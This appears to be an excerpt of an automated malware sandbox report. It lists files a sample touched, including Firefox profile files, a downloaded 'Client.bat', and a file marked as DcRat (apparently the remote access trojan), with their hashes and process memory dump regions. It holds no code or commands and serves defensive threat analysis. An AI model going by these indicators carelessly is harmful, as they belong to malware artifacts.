C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pz5zwzp5.default-release\datareporting\glean\db\data.safe.tmp

Filesize
22KB

MD5
be7177c7ba8d5d5a2e9bc8733b9af81f

SHA1
2e31709b1b804ef61fb7a6b08f0e7f14ffbd946b

SHA256
254fd9b79c67cb05fb44f05623bba9fb9daccae08c4df1358f74213639f8bd37

SHA512
cc0ad78f7715a1c82db4e0a50eb6f2a1ac5d65ac02fcf4ab0f81f329216d6c1da04c81c4f4627862afcfbc8ee940563784bc27dce163365667aa036d33601323

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pz5zwzp5.default-release\datareporting\glean\db\data.safe.tmp

Filesize
22KB

MD5
e19f3bcb73057e67b57a3d902627f023

SHA1
fe3765c88c00ab530f7e2eb8f45c697c9017621e

SHA256
8e260d19e9ebfbb6c844be03abe46d98c23864258fefcd95b20c2f11f0d7d92d

SHA512
638aba7e921b2dceff6bda0f698445de6db3ad2dc620bc7acbc531969eacb5b4b47b17e4c125475c12a33730b4d64689ee92ca618aa1f5b7565dd0fb56d21909

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pz5zwzp5.default-release\datareporting\glean\pending_pings\584e5d8c-72e3-4755-b637-73444a8ef10c

Filesize
659B

MD5
49626a757fca2bf73c3193bb29b58272

SHA1
030ef588d98b97515521897247302a7d7e2e52c9

SHA256
8e13ecb9719a0f701cd0118f742c84d15184bcb4f401726f94bdd051e72ff4cb

SHA512
79431fc0710e355b4a8623b8e183ef3bc957932638edf6a36b8926df90796db2ca9c998bec2c63be475d38b4cc7317491a445e16cbdba9c1b3ea43f8176c465b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pz5zwzp5.default-release\datareporting\glean\pending_pings\b36375c0-7568-4d8d-9768-ae2c7cec8098

Filesize
982B

MD5
b815cc636d1047a86e0ab344c89322ec

SHA1
217f0a5e90c51236ff1ebc86943a6545d3a2102b

SHA256
409dc452ebf8d9ed32e0e651b5305138a7b8f2158125c6b8e5275c094ede8452

SHA512
9e93a80cb049f676d12899af46c93efdae9c5aaaebfc90c22cac501b9cc7e7345c6905a4115d2da044449b9e6c4bb34023b70c0e38feeaab5f6bba7fe5b9e648

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pz5zwzp5.default-release\prefs.js

Filesize
8KB

MD5
be2c0bfeacc1ed7ef27852bcbe9146c4

SHA1
e8820eb4b97b135ac36af19412a0eab98dd31f4a

SHA256
38bedae66fcd8ef94574f674773bbf38bc01127e35456eb119d0e913b313b0eb

SHA512
64510ec8b28a6677186f9e9d3f544a51280491db8f10881f33c7b3c869156d8f02733368abf0c4ab91a3c2035003bbf6e3ba8334bd567bc79c4f356d0061eac2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pz5zwzp5.default-release\prefs.js

Filesize
8KB

MD5
05870e35e5b751a496af9a176f27510e

SHA1
e513cf53638253f502786daf192eeb18436087b1

SHA256
fe4f4c440abc4fb8141df3dfecc2ba00d7ab3cc450e50597575bc1ce9cf03783

SHA512
6eb832f5eecfe55867ec25539401f2d82f855295ef0f080fbb1431337c6375ca9f4116166a048d3560d9d420180b97e523102f1433c8a1fbfa5001c2b6b9784d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pz5zwzp5.default-release\sessionCheckpoints.json.tmp

Filesize
259B

MD5
700fe59d2eb10b8cd28525fcc46bc0cc

SHA1
339badf0e1eba5332bff317d7cf8a41d5860390d

SHA256
4f5d849bdf4a5eeeb5da8836589e064e31c8e94129d4e55b1c69a6f98fb9f9ea

SHA512
3fa1b3fd4277d5900140e013b1035cb4c72065afcc6b6a8595b43101cfe7d09e75554a877e4a01bb80b0d7a58cdcfe553c4a9ef308c5695c5e77cb0ea99bada4

Download Submit
C:\Users\Admin\Downloads\Client.bat:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\vcredist2010_x64.log.html.DcRat

Filesize
86KB

MD5
de7b75eac1fcd850408c14c168e3297f

SHA1
612911168d9f16a0e16f696e5df0755e26865ede

SHA256
0e0ba194729e3936c083192f1d8f5809fd2e59b3e158536ad4a46e787c7f360a

SHA512
bb2ab5395218c6e970fe23273f5cee27313d0c9bd3f5765859040918e6bf079701c2d86900b47d04374b71779170bddcb9df9d1536115a21f00a1a1d7d51d071

Download Submit
memory/404-727-0x000001EA292C0000-0x000001EA29306000-memory.dmp

Filesize
280KB

Download
memory/404-718-0x000001EA28E10000-0x000001EA28E32000-memory.dmp

Filesize
136KB

Download
memory/404-730-0x000001EA28ED0000-0x000001EA28ED8000-memory.dmp

Filesize
32KB

Download
memory/404-731-0x000001EA28EF0000-0x000001EA28F3A000-memory.dmp

Filesize
296KB

Download
memory/1064-871-0x00007FF92DA50000-0x00007FF92DA60000-memory.dmp

Filesize
64KB

Download
memory/1164-870-0x00007FF92DA50000-0x00007FF92DA60000-memory.dmp

Filesize
64KB

Download
memory/1272-872-0x00007FF92DA50000-0x00007FF92DA60000-memory.dmp

Filesize
64KB

Download
memory/1428-876-0x00007FF92DA50000-0x00007FF92DA60000-memory.dmp

Filesize
64KB

Download
memory/1688-873-0x00007FF92DA50000-0x00007FF92DA60000-memory.dmp

Filesize
64KB

Download
memory/1736-878-0x00007FF92DA50000-0x00007FF92DA60000-memory.dmp

Filesize
64KB

Download
memory/2108-879-0x00007FF92DA50000-0x00007FF92DA60000-memory.dmp

Filesize
64KB

Download
memory/2140-0-0x00007FF96D9C0000-0x00007FF96DBC9000-memory.dmp

Filesize
2.0MB

Download
memory/2140-2-0x00007FF96C3B0000-0x00007FF96C44E000-memory.dmp

Filesize
632KB

Download
memory/2140-4-0x00007FF96D9C0000-0x00007FF96DBC9000-memory.dmp

Filesize
2.0MB

Download
memory/2140-3-0x00007FF96D9C1000-0x00007FF96DAEA000-memory.dmp

Filesize
1.2MB

Download
memory/2140-1-0x00007FF96CCB0000-0x00007FF96CD5E000-memory.dmp

Filesize
696KB

Download
memory/2420-875-0x00007FF92DA50000-0x00007FF92DA60000-memory.dmp

Filesize
64KB

Download
memory/2452-877-0x00007FF92DA50000-0x00007FF92DA60000-memory.dmp

Filesize
64KB

Download
memory/3316-822-0x0000000002DB0000-0x0000000002DDA000-memory.dmp

Filesize
168KB

Download
memory/3316-869-0x00007FF92DA50000-0x00007FF92DA60000-memory.dmp

Filesize
64KB

Download
memory/4380-874-0x00007FF92DA50000-0x00007FF92DA60000-memory.dmp

Filesize
64KB

Download
memory/5792-821-0x000002AA7C650000-0x000002AA7C662000-memory.dmp

Filesize
72KB

Download
memory/5792-1141-0x000002AA7CEC0000-0x000002AA7CF36000-memory.dmp

Filesize
472KB

Download
memory/5792-1142-0x000002AA7CE40000-0x000002AA7CEA4000-memory.dmp

Filesize
400KB

Download
memory/5792-1143-0x000002AA7CF40000-0x000002AA7CF5E000-memory.dmp

Filesize
120KB

Download
memory/5792-1144-0x000002AA7CEA0000-0x000002AA7CEAE000-memory.dmp

Filesize
56KB

Download
memory/5792-1170-0x000002AA7D120000-0x000002AA7D12C000-memory.dmp

Filesize
48KB

Download
memory/5792-1185-0x000002AA7D140000-0x000002AA7D14E000-memory.dmp

Filesize
56KB

Download
memory/5792-1205-0x000002AA7D890000-0x000002AA7D8AE000-memory.dmp

Filesize
120KB

Download